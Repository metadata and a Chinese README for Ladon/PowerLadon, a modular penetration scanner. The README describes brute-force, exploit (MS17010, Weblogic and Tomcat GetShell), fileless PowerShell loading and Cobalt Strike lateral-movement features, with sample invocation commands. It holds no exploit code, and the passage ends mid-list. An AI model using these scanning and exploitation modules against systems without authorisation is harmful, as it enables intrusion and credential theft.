{"id":19951828,"url":"https://github.com/k8gege/powerladon","last_synced_at":"2025-03-17T15:12:47.945Z","repository":{"id":45999183,"uuid":"222740271","full_name":"k8gege/PowerLadon","owner":"k8gege","description":"Ladon hacking Scanner for PowerShell, vulnerability / exploit / detection / MS17010/SmbGhost,Brute-Force SMB/IPC/WMI/NBT/SSH/FTP/MSSQL/MYSQL/ORACLE/VNC","archived":false,"fork":false,"pushed_at":"2023-12-19T15:26:41.000Z","size":51790,"stargazers_count":176,"open_issues_count":0,"forks_count":56,"subscribers_count":11,"default_branch":"master","last_synced_at":"2025-03-02T13:08:30.449Z","etag":null,"topics":["exp","exploit","hacking","ladon","lanscanner","netscan","pentest","pentest-tool","pentesting-networks","poc","portscan","security","subdomain-scanner","vulscan"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/k8gege.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2019-11-19T16:28:19.000Z","updated_at":"2025-02-14T17:10:53.000Z","dependencies_parsed_at":"2024-01-31T04:06:56.388Z","dependency_job_id":null,"html_url":"https://github.com/k8gege/PowerLadon","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FPowerLadon","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FPowerLadon/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FPowerLadon/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/k8gege%2FPowerLadon/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/k8gege","download_url":"https://codeload.github.com/k8gege/PowerLadon/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244056425,"owners_count":20390719,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exp","exploit","hacking","ladon","lanscanner","netscan","pentest","pentest-tool","pentesting-networks","poc","portscan","security","subdomain-scanner","vulscan"],"created_at":"2024-11-13T01:09:52.748Z","updated_at":"2025-03-17T15:12:47.918Z","avatar_url":"https://github.com/k8gege.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Ladon 911 for PowerShell\n![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg)\n\n[![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) \n[![Ladon](https://img.shields.io/badge/PowerLadon-911-yellowgreen)](https://github.com/k8gege/PowerLadon) \n[![Bin](https://img.shields.io/badge/PowerLadon-Bin-ff69b4)](https://github.com/k8gege/PowerLadon/releases) \n[![GitHub issues](https://img.shields.io/github/issues/k8gege/PowerLadon)](https://github.com/k8gege/PowerLadon/issues) \n[![Github Stars](https://img.shields.io/github/stars/k8gege/PowerLadon)](https://github.com/k8gege/PowerLadon) \n[![GitHub forks](https://img.shields.io/github/forks/k8gege/PowerLadon)](https://github.com/k8gege/PowerLadon)\n[![GitHub license](https://img.shields.io/github/license/k8gege/PowerLadon)](https://github.com/k8gege/PowerLadon)\n[![Downloads](https://img.shields.io/github/downloads/k8gege/PowerLadon/total?label=Release%20Download)](https://github.com/k8gege/PowerLadon/releases/latest)\n\n\n### Ladon\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/Ladon.gif\u003e\u003c/img\u003e\n### LadonGUI\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/LadonGUI.gif\u003e\u003c/img\u003e\n### Cobalt Strike\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/CS_Ladon.gif\u003e\u003c/img\u003e\n### PowerLadon\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/PowerLadon.gif\u003e\u003c/img\u003e\n### PythonLadon\n\u003cimg src=https://k8gege.github.io/k8img/Ladon//py/PyLadon.PNG\u003e\u003c/img\u003e\n### LinuxLadon\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/lnx/Linux_OnlinePC.PNG\u003e\u003c/img\u003e\n\n### 使用说明\n\nID | 主题 |  URL \n-|-|-\n1 | Ladon文档主页 | https://github.com/k8gege/Ladon/wiki\n2 | 基础用法详解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage\n3 | Cobalt Strike | https://github.com/k8gege/Aggressor\n4 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage\n5 | 高度自定义插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle\n6 | 外部模块参考 | https://github.com/k8gege/K8CScan/wiki\n7 | PowerLadon | https://github.com/k8gege/powerladon\n8 | PythonLadon | https://github.com/k8gege/PyLadon\n9 | LinuxLadon | https://github.com/k8gege/LinuxLadon\n10 | 漏洞演示视频 | https://github.com/k8gege/K8CScan/tree/master/Video\n\n### 源码编译\ngit clone https://github.com/k8gege/Ladon.git\u003cbr\u003e\n使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE\u003cbr\u003e\n\n### 成品下载\nhttps://github.com/k8gege/Ladon/releases\u003cbr\u003e\nWin7/2008或安装.net 2.x 3.x系统可以使用3.5的exe\u003cbr\u003e\nWin8-win10或安装.net 4.x系统可以使用4.0的exe\u003cbr\u003e\n\n### 关于\n\nLadon是希腊神话中的神兽，看守金苹果的百头巨龙。它从不睡觉，被赫拉克勒斯借扛天巨人之手诱巨龙睡着\u003cbr\u003e\n杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中，偷盗者将金苹果送给了白雪公主，公主\u003cbr\u003e\n为了报恩将金苹果分给了七个小矮人，吃下以后他们变成了龙珠散落到世界各地，龙珠分为七颗，它蕴含着\u003cbr\u003e\n可以令奇迹发生的力量。当集齐7颗龙珠念出咒语，就能召唤神龙，而神龙则会实现召唤者提出的一个愿望。\u003cbr\u003e\n\n### 前言\n\n无论内网还是外网渗透信息收集都是非常关键，信息收集越多越准确渗透的成功率就越高。\u003cbr\u003e\n但成功率还受到漏洞影响，漏洞受时效性影响，对于大型内网扫描速度直接影响着成功率。\u003cbr\u003e\n漏洞时效性1-2天，扫描内网或外网需1周时间，是否会因此错过很多或许可成功的漏洞？\u003cbr\u003e\n对于那些拥有几百上千域名的大站来说，你发现越快成功率就越高，慢管理员就打补丁了。\u003cbr\u003e\n因此我们需要一个支持批量C段/B段甚至A段的扫描器，添加自定义模块快速检测新出漏洞。\u003cbr\u003e\n\n### 程序简介\n\nLadon模块化网络渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.8版本内置198个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\\NBT\\DNS\\MAC\\SMB\\WMI\\SSH\\HTTP\\HTTPS\\Exchange\\mssql\\FTP\\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\\BadPotato\\EfsPotato\\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。\u003cbr\u003e\n\n### 使用简单\n\n虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手\u003cbr\u003e\n只需一或两个参数就可用90%的功能,一个模块相当于一个新工具\u003cbr\u003e\n\n### 运行环境\n\nLadon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)\u003cbr\u003e\n如Cmd、PowerShell、远控Cmd、WebShell等，以及Cobalt Strike内存加载使用\u003cbr\u003e\nLadon.ps1完美兼容win7-win10 PowerShell，不看版本可远程加载实现无文件渗透\u003cbr\u003e\n\n### 奇葩条件\n\n实战并不那么顺利，有些内网转发后很卡或无法转发，只能将工具上传至目标\u003cbr\u003e\n有些马可能上传两三M的程序都要半天甚至根本传不了，PY的几十M就更别想了\u003cbr\u003e\nLadon采用C#研发，程序体积很小500K左右，即便马不行也能上传500K程序吧\u003cbr\u003e\n还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的\u003cbr\u003e\n\n### 宗旨\n\n为用户提供一个简单易用、功能丰富、高度灵活、可定制的扫描工具，减少大量重复操作提高工作效率\u003cbr\u003e\n\n### 程序参数功能\n\n1  支持指定IP扫描\u003cbr\u003e\n2  支持指定域名扫描\u003cbr\u003e\n3  支持指定机器名扫描\u003cbr\u003e\n4  支持指定C段扫描(ip/24)\u003cbr\u003e\n5  支持指定B段扫描(ip/16)\u003cbr\u003e\n6  支持指定A段扫描(ip/8)\u003cbr\u003e\n7  支持指定URL扫描\u003cbr\u003e\n8  支持批量IP扫描(ip.txt)\u003cbr\u003e\n9  支持批量C段扫描(ip24.txt)\u003cbr\u003e\n10 支持批量B段扫描(ip16.txt)\u003cbr\u003e\n11 支持批量URL扫描(url.txt)\u003cbr\u003e\n12 支持批量域名扫描(domain.txt)\u003cbr\u003e\n13 支持批量机器名扫描(host.txt)\u003cbr\u003e\n14 支持批量字符串列表(str.txt)\u003cbr\u003e\n15 支持主机帐密列表(check.txt)\u003cbr\u003e\n16 支持用户密码列表(userpass.txt)\u003cbr\u003e\n17 支持指定范围C段扫描\u003cbr\u003e\n18 支持参数加载自定义DLL（仅限C#）\u003cbr\u003e\n19 支持参数加载自定义EXE（仅限C#）\u003cbr\u003e\n20 支持参数加载自定义INI配置文件\u003cbr\u003e\n21 支持参数加载自定义PowerShell\u003cbr\u003e\n22 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)\u003cbr\u003e\n23 支持自定义模块(支持多种语言编写的DLL/.NET程序集/PowerShell脚本)\u003cbr\u003e\n24 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)\u003cbr\u003e\n\n### 内置功能模块(40)\n\n#### 0x001 资产扫描\u003cbr\u003e\n\n例子: Ladon OnlinePC(扫当前机器所处C段，其它模块同理)\u003cbr\u003e\n例子: Ladon 192.168.1.8/24 OnlinePC\u003cbr\u003e\n\nID | 模块名称 |  功能说明  | 返回结果\n-|-|-|-\n1 | [OnlinePC](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F) | 存活主机扫描 | 存活IP、Mac地址、机器名\n2 | [OnlineIP](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F) | 仅存活主机IP | 存活IP\n3 | [UrlScan](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-C%E6%AE%B5%E5%9F%9F%E5%90%8DURL%E6%89%AB%E6%8F%8F)  | URL域名扫描 | 同服URL（不验证IP、域名、Web标题）\n4 | [SameWeb](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-C%E6%AE%B5%E6%97%81%E7%AB%99%E5%9F%9F%E5%90%8D%E6%89%AB%E6%8F%8F)  | 同服域名扫描 | 同服URL（验证IP、域名、Web标题）\n5 | [WebScan](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-Web%E8%B5%84%E4%BA%A7%E6%89%AB%E6%8F%8F)  | Web信息扫描 | 存活IP、主机名、Banner、Web标题\n6 | [WebDir](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-Web%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F)  | 后台目录扫描 | 地址、HTTP状态\n7 | [SubDomain](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E5%AD%90%E5%9F%9F%E5%90%8D%E7%88%86%E7%A0%B4)  | 子域名爆破 | 子域名 (可用DomainIP/HostIP解析)\n8 | [DomainIP](https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD-%E6%89%B9%E9%87%8F%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90)  | 域名解析IP | 域名、IP\n9 | [HostIP](https://github.com/k8gege/Ladon/wiki/%E5%AE%9E%E7%94%A8%E5%8A%9F%E8%83%BD-%E6%89%B9%E9%87%8F%E4%B8%BB%E6%9C%BA%E5%90%8D%E8%A7%A3%E6%9E%90)  | 主机名转IP | IP、域名\n\n\n#### 0x002 指纹识别/服务识别\u003cbr\u003e\n\n例子: Ladon OsScan\u003cbr\u003e\n例子: Ladon 192.168.1.8/24 OsScan\u003cbr\u003e\n\nID | 模块名称 |  功能说明  | 返回结果\n-|-|-|-\n1 | [OsScan](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%8E%A2%E6%B5%8B)  |  操作系统版本探测 | 存活IP、机器名、操作系统\n2 | [PortScan](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F(%E6%9C%8D%E5%8A%A1%E8%AF%86%E5%88%AB))  | 端口扫描含Banner | 主机名、开放端口、服务识别、Banner、Web标题\n3 | [WhatCMS](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-Web%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB)  |  75种Web指纹识别 | URL、CMS版本、登陆页面、中间件等\n4 | [CiscoScan](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E6%80%9D%E7%A7%91%E8%AE%BE%E5%A4%87%E6%89%AB%E6%8F%8F)  | 思科设备扫描 | 存活IP、设备型号、主机名、Boot、硬件版本\n5 | [EnumMssql](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E6%9E%9A%E4%B8%BE%E5%86%85%E7%BD%91MSSQL%E4%B8%BB%E6%9C%BA)  | 枚举Mssql数据库主机 | 数据库IP、机器名、SQL版本\n6 | [EnumShare](https://github.com/k8gege/Ladon/wiki/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E6%9E%9A%E4%B8%BE%E7%BD%91%E7%BB%9C%E5%85%B1%E4%BA%AB%E8%B5%84%E6%BA%90)  | 枚举网络共享资源 | 域、存活IP、共享路径\n\n#### 0x003 口令检测/密码爆破\u003cbr\u003e\n[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]\u003cbr\u003e\n\n例子: Ladon SshScan\u003cbr\u003e\n例子: Ladon 192.168.1.8/24 SshScan\u003cbr\u003e\n例子: Ladon 192.168.1.8:22 SshScan (指定端口)\u003cbr\u003e\n例子: Ladon test.rar RarScan\u003cbr\u003e\n\nID | 模块名称 |  功能说明  | 返回结果 | 依赖\n-|-|-|-|-\n1 | [WmiScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-WmiScan(Windows))  |  Wmi密码爆破(Windowns) | 检测状态以及正确密码日志 | \n2 | [IpcScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%B4%E7%88%86%E7%A0%B4-IpcScan(Windows))  |  Ipc密码爆破(Windows) | 检测状态以及正确密码日志 | \n3 | [SmbScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-SmbScan(Windows))  |  SMB密码爆破(Windows) | 检测状态以及正确密码日志 | SharpCifs.dll\n4 | [SshScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-SSHscan(Linux))  |  SSH密码爆破(Linux) | 检测状态以及正确密码日志 | Renci.SshNet.dll\n5 | [MssqlScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-MSSQL%E6%95%B0%E6%8D%AE%E5%BA%93)  | Mssql数据库密码爆破 | 检测状态以及正确密码日志 | \n6 | [OracleScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-Oracle%E6%95%B0%E6%8D%AE%E5%BA%93)  | Oracle数据库密码爆破 | 检测状态以及正确密码日志 | DDTek.Oracle.dll\n7 | [MysqlScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-MySQL%E6%95%B0%E6%8D%AE%E5%BA%93)  | Mysql数据库密码爆破 | 检测状态以及正确密码日志  | MySql.Data.dll\n8 | [WeblogicScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-Weblogic%E5%AF%86%E7%A0%81%E6%A3%80%E6%B5%8B) | Weblogic后台密码爆破 | 检测状态以及正确密码日志 | \n9 | [VncScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-VNC%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2)  |  VNC远程桌面密码爆破 | 检测状态以及正确密码日志  | VncSharp.dll\n10 | [FtpScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-FTP%E6%96%87%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8)  |  Ftp服务器密码爆破 | 检测状态以及正确密码日志 | \n11 | [RarScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-Rar%E6%96%87%E4%BB%B6%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3)  |  Rar压缩包密码爆破 | 检测状态以及正确密码日志  | Rar.exe\n12 | [TomcatScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-TomcatScan%E6%A8%A1%E5%9D%97Tomcat%E5%90%8E%E5%8F%B0%E7%99%BB%E9%99%86%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%A3%80%E6%B5%8B)  |  Tomcat后台登陆密码爆破 | 检测状态以及正确密码日志\n13 | [HttpBasicScan](https://github.com/k8gege/Ladon/wiki/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4-HttpBasicScan%E6%A8%A1%E5%9D%97phpMyAdmin%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%A3%80%E6%B5%8B)  | HttpBasic401认证密码爆破 | 检测状态以及正确密码日志\n\n#### 0x004 漏洞检测/漏洞利用\n\n例子: Ladon MS17010\u003cbr\u003e\n例子: Ladon 192.168.1.8/24 MS17010\u003cbr\u003e\n例子: Ladon http://192.168.1.8 WeblogicExp\u003cbr\u003e\n\nID | 模块名称 |  功能说明  \n-|-|-\n1 | [MS17010](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-MS17010%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B)   | SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148)\u003cbr\u003e\n2 | [WeblogicPoc](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2019-2725-Weblogic-GetShell-Exploit) | Weblogic漏洞检测(CVE-2019-2725/[CVE-2018-2894](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894))\u003cbr\u003e\n3 | [PhpStudyPoc](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-PhpStudy%E5%90%8E%E9%97%A8%E6%A3%80%E6%B5%8B) |  PhpStudy后门检测(phpstudy 2016/phpstudy 2018)\u003cbr\u003e\n4 | [ActivemqPoc](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F--CVE-2016-3088) |  ActiveMQ漏洞检测(CVE-2016-3088) \u003cbr\u003e\n5 | [TomcatPoc](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2017-12615)  | Tomcat漏洞检测(CVE-2017-12615)\u003cbr\u003e\n6 | [WeblogicExp](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2019-2725-Weblogic-GetShell-Exploit) | Weblogic漏洞利用(CVE-2019-2725)\u003cbr\u003e\n7 | [TomcatExp](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-CVE-2017-12615)  | Tomcat漏洞利用(CVE-2017-12615)\u003cbr\u003e\n8 | [Struts2Poc](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-Struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B) | Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)\u003cbr\u003e\n\n#### 0x005 加密解密\n例子: Ladon 字符串 EnHex\u003cbr\u003e\n例子: Ladon EnHex (批量str.txt)\u003cbr\u003e\n\nID | 模块名称 |  功能说明  \n-|-|-\n1 | [EnHex](https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86-%E6%89%B9%E9%87%8FHex%E5%AF%86%E7%A0%81) |  批量Hex密码加密\u003cbr\u003e\n2 | [DeHex](https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86-%E6%89%B9%E9%87%8FHex%E5%AF%86%E7%A0%81)  |  批量Hex密码解密\u003cbr\u003e\n3 | [EnBase64](https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86-%E6%89%B9%E9%87%8FBase64%E5%AF%86%E7%A0%81) |  批量Base64密码加密\u003cbr\u003e\n4 | [DeBase64](https://github.com/k8gege/Ladon/wiki/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86-%E6%89%B9%E9%87%8FBase64%E5%AF%86%E7%A0%81)  | 批量Base64密码解密\u003cbr\u003e\n\n注：以上仅是该工具内置模块的初级用法，外置插件或更高级用法请查看使用文档\u003cbr\u003e\n 中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用\u003cbr\u003e\n 高级用法Exp生成器一键生成Poc，使用各种语言编写插件扩展Ladon扫描能力。\u003cbr\u003e\n\n### 外部插件模块(10)\n\nID | 功能 | 实现语言 | 功能说明  \n-|-|-|-\n1 | 漏洞扫描 | C语言 | [CVE 2019-0708 Windows Rdp 3389漏洞批量检测](https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2019-0708-Windows-Rdp%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C)\n2 | 漏洞利用 | Exp生成器 |[ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit](https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-ThinkPHP-5.0.22-5.1.29-RCE-GetShell-Exploit)\n3 | 漏洞利用 | Python | [CVE-2019-9621 Zimbra GetShell Exploit](https://github.com/k8gege/ZimbraExploit)\n4 | 漏洞利用 | Python | [CVE-2019-0604 SharePoint GetShell Exploit](https://github.com/k8gege/CVE-2019-0604)\n5 | 漏洞利用 | Exp生成器 | [CVE 2016-3088 ActiveMQ GetShell Exploit](https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-CVE-2016-3088-ActiveMQ-GetShell-Exploit)\n6 | 漏洞利用 | Python | [Apache Solr 8.2.0 Velocity RCE 0day Exploit](https://github.com/k8gege/SolrExp)\n7 | 漏洞利用 | Exp生成器 | [PhpStudy后门 GetShell Exploit](https://github.com/k8gege/K8CScan/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-PhpStudy%E5%90%8E%E9%97%A8)\n8 | 命令执行 | INI配置 | [INI调用外部程序命令批量Linux上控](https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4-%E6%89%B9%E9%87%8FSSH%E4%B8%8A%E6%8E%A7)\n9 | 命令执行 | INI配置 | [INI调用外部程序命令批量Windowns上控](https://github.com/k8gege/K8CScan/wiki/%E8%B0%83%E7%94%A8%E5%91%BD%E4%BB%A4-%E6%89%B9%E9%87%8FWin%E4%B8%8A%E6%8E%A7)\n10 | 漏洞扫描 | Python | [PHP-FPM 远程代码执行漏洞(CVE-2019-11043)](https://github.com/k8gege/CVE-2019-11043)\n11 | 漏洞扫描 | Exp生成器 |[Weblogic CVE-2018-2894漏洞检测](https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894)\n12 | 漏洞利用 | PowerShell | [MS17010EXP 永恒之蓝漏洞利用](https://github.com/k8gege/MS17010EXP)\n\n\n文档参考Cscan: https://github.com/k8gege/K8CScan/wiki\n\n## 中级用法\n\n### 批量扫描\n0x001 参数 ip/24 ip/16 ip/8\u003cbr\u003e\n命令: Ladon 192.168.1.8/24 OnlinePC\u003cbr\u003e\n\n0x002 文件 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt\u003cbr\u003e\n程序根目录下创建对应文件即可,如批量扫描多个ip使用ip.txt,批量扫多个C段使用ip24.txt\u003cbr\u003e\n无需指定txt程序会自动加载文件进行扫描,如扫描存活主机只需命令: Ladon OnlinePC\u003cbr\u003e\n\n### 禁ping扫描\n默认扫描会先通过icmp扫描主机是否存活，当使用工具转发内网\u003cbr\u003e\n或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点\u003cbr\u003e\nLadon noping\u003cbr\u003e\nLadon noping 192.168.1.8/24\u003cbr\u003e\nLadon noping 192.168.1.8/24 MS17010\u003cbr\u003e\n\n### 配置INI调用任意程序或命令脚本\n适用场景，需调用相关命令或第三方工具进行批量操作\u003cbr\u003e\n或者有新的POC，但来不及或无法写成DLL来调用时\u003cbr\u003e\n很多第3方工具不支持批量或者说根本不支持批量网段\u003cbr\u003e\n而Ladon不只限于批量IP、URL、IP段、任意内容等\u003cbr\u003e\n是紧急情况下最适合用于验证内网是否存在漏洞工具\u003cbr\u003e\n新的漏洞来时你能调好POC就不错了，批量更要时间\u003cbr\u003e\n\n1  调用系统ping命令进行存活主机探测\nping.ini\u003cbr\u003e\n[Ladon]\u003cbr\u003e\nexe=cmd.exe\u003cbr\u003e\narg=/c ping $ip$\u003cbr\u003e\n\n命令:  Ladon ping.ini\u003cbr\u003e\n命令:  Ladon 192.168.1.8/24 ping.ini\u003cbr\u003e\n\n2  调用Python poc批量检测漏洞\n[Ladon]\u003cbr\u003e\nexe=F:\\Python279\\python.exe\u003cbr\u003e\narg=CVE-2019-11043-POC.py $ip$\u003cbr\u003e\n\n例子: https://github.com/k8gege/CVE-2019-11043\n\n### 配置端口扫描参数\n使用PortScan模块时，默认扫描常见高危漏洞端口\u003cbr\u003e\n遇到修改了默认端口的，Ladon就无法扫描了吗？\u003cbr\u003e\n使用port.txt\u003cbr\u003e\n格式1:80,21,1433,3306,445\u003cbr\u003e\n格式2:80-88,21-23,5800-5900\u003cbr\u003e\n格式3:\u003cbr\u003e\n21\u003cbr\u003e\n23\u003cbr\u003e\n80\u003cbr\u003e\n格式4:\u003cbr\u003e\n80-88\u003cbr\u003e\n21-23\u003cbr\u003e\n\n### 配置密码爆破参数\n1  支持标准的user.txt和pass.txt帐密破解，爆破每个用户都需将密码跑完或跑出正确为此\u003cbr\u003e\n2  